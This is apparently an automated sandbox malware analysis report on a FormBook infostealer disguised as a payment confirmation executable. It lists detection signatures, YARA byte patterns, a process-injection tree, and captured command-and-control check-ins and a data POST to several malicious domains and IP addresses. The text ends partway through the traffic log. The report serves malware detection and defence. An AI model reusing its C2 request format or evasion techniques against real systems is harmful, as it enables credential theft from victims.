Windows Analysis Report
Payment confirmation 20240911.exe

Overview

General Information

Sample name: Payment confirmation 20240911.exe
Analysis ID: 1509210
MD5: fce0847be56787ed350b9aa76990d91d
SHA1: 5c3d8ca6e50e763b87244d7b9e84eab52ad6464f
SHA256: f5be3462bef54d4bd79a337ab058dd1663c0a3d23a27f1c7573dde13893c8db2

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • Payment confirmation 20240911.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\Payment confirmation 20240911.exe" MD5: FCE0847BE56787ED350B9AA76990D91D)
    • svchost.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\Payment confirmation 20240911.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • xONxwdydvq.exe (PID: 1544 cmdline: "C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 3292 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 08D323750350A8A29611D1004C0CF319)
          • firefox.exe (PID: 3464 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x42872:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2aa71:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine|base64offset|contains: r*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ParentImage: C:\Users\user\Desktop\Payment confirmation 20240911.exe, ParentProcessId: 3216, ParentProcessName: Payment confirmation 20240911.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ProcessId: 3264, ProcessName: svchost.exe
            Source: Registry Key set; Author: frack113; Data: Details: <binary value hex dump omitted>, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\RMActivate_ssp.exe, ProcessId: 3292, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine|base64offset|contains: r*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ParentImage: C:\Users\user\Desktop\Payment confirmation 20240911.exe, ParentProcessId: 3216, ParentProcessName: Payment confirmation 20240911.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ProcessId: 3264, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-11T10:09:08.800408+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49161 | 47.57.185.227 | 80 | TCP
            2024-09-11T10:09:27.129558+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49166 | 89.58.49.1 | 80 | TCP
            2024-09-11T10:09:58.325132+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49170 | 154.23.184.240 | 80 | TCP
            2024-09-11T10:10:11.711785+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 85.159.66.93 | 80 | TCP
            2024-09-11T10:10:25.063039+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49178 | 185.173.111.76 | 80 | TCP
            2024-09-11T10:10:38.517261+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49182 | 203.161.43.228 | 80 | TCP
            2024-09-11T10:10:51.794228+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49186 | 161.97.168.245 | 80 | TCP
            2024-09-11T10:11:05.390377+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49190 | 172.96.191.39 | 80 | TCP
            2024-09-11T10:11:18.744513+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49194 | 104.21.20.125 | 80 | TCP
            2024-09-11T10:11:32.596650+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49198 | 43.242.202.169 | 80 | TCP


            AV Detection

            Source: Payment confirmation 20240911.exe; ReversingLabs: Detection: 31%
            Source: Payment confirmation 20240911.exe; Virustotal: Detection: 33%
            Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Payment confirmation 20240911.exe; Joe Sandbox ML: detected
            Source: Payment confirmation 20240911.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xONxwdydvq.exe, 00000003.00000002.745699004.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.379153081.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379175938.0000000000380000.00000004.00000020.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372791774.0000000000757000.00000004.00000001.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372875167.00000000003E0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Payment confirmation 20240911.exe, 00000000.00000003.349937356.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.386096763.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368106439.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368458108.0000000000720000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.386096763.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387256900.0000000001C80000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387592222.0000000001DE0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.0000000001F70000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xONxwdydvq.exe, 00000003.00000002.746297118.000000000485C000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745454539.000000000061C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.000000000281C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.453233728.000000000106C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012FDD92 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0133219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01332044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01326B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01326E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132FD47 FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Code function: 4x nop then xor eax, eax 3_2_004060CB
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Code function: 4x nop then mov esp, ebp 3_2_00400561
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Code function: 4x nop then pop edi 3_2_004116EF

            Networking

            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49178 -> 185.173.111.76:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49161 -> 47.57.185.227:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49174 -> 85.159.66.93:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49190 -> 172.96.191.39:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49182 -> 203.161.43.228:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49194 -> 104.21.20.125:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49198 -> 43.242.202.169:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49166 -> 89.58.49.1:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49170 -> 154.23.184.240:80
            Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49186 -> 161.97.168.245:80
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; DNS query: www.golbasi-nakliyat.xyz
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; DNS query: www.kckartal.xyz
            Source: Joe Sandbox View; IP Address: 45.33.6.223
            Source: Joe Sandbox View; IP Address: 85.159.66.93
            Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox View; ASN Name: CIZGITR
            Source: Joe Sandbox View; ASN Name: VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox View; ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0133550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3220000[1].zip
            Source: global traffic; HTTP traffic detected:
                GET /w9nd/?OlTXe=9dRK0h7YIJsGSRnhz+5Tf8djouf69SHBPHBwJCn+XP7nQ6BgyCo2HiS/iTx4FkUQNu4yOr79gxANSvRKU1dByDA5Y/6ByTaTkhQGev+u0gipHNJhsTWzO6tEXOan&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.726075.buzz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /2018/sqlite-dll-win32-x86-3220000.zip HTTP/1.1
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Host: www.sqlite.org
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: global traffic; HTTP traffic detected:
                GET /xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.freepicture.online
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.hm62t.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /k2vl/?OlTXe=TxupyKnRMohPPcJUOS0MXPimpk4F304dGmgAGE+PRAnDIVDTmPtylWW9xTGIc+3DzvKXbunYVpmmYdbvcJ53VYYaSs8c8gEur6KMZZBX2lUDNg59LBcCd3WrENlZ&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.golbasi-nakliyat.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.mfgamecompany.shop
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.quilo.life
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.qiluqiyuan.buzz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.bola88site.one
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.kckartal.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en
                Host: www.mizuquan.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global traffic; DNS traffic detected: DNS query: www.monos.shop
            Source: global traffic; DNS traffic detected: DNS query: www.726075.buzz
            Source: global traffic; DNS traffic detected: DNS query: www.sqlite.org
            Source: global traffic; DNS traffic detected: DNS query: www.freepicture.online
            Source: global traffic; DNS traffic detected: DNS query: www.318st.com
            Source: global traffic; DNS traffic detected: DNS query: www.hm62t.top
            Source: global traffic; DNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.mfgamecompany.shop
            Source: global traffic; DNS traffic detected: DNS query: www.quilo.life
            Source: global traffic; DNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global traffic; DNS traffic detected: DNS query: www.bola88site.one
            Source: global traffic; DNS traffic detected: DNS query: www.kckartal.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.mizuquan.top
            Source: global traffic; DNS traffic detected: DNS query: www.kxshopmr.store
            Source: unknown; HTTP traffic detected:
                POST /xcfw/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en
                Host: www.freepicture.online
                Origin: http://www.freepicture.online
                Referer: http://www.freepicture.online/xcfw/
                Content-Type: application/x-www-form-urlencoded
                Connection: close
                Content-Length: 2162
                Cache-Control: max-age=0
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Data Raw: <hex dump of request body omitted>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 11 Sep 2024 08:09:08 GMT
                Content-Type: text/html
                Content-Length: 138
                Connection: close
                ETag: "6663edd0-8a"
                Data Raw: <hex dump omitted>
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 11 Sep 2024 08:09:19 GMT
                Server: Apache
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: <hex dump omitted>
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 11 Sep 2024 08:09:21 GMT
                Server: Apache
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: <hex dump omitted>
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 11 Sep 2024 08:09:24 GMT
                Server: Apache
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: <hex dump omitted>
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
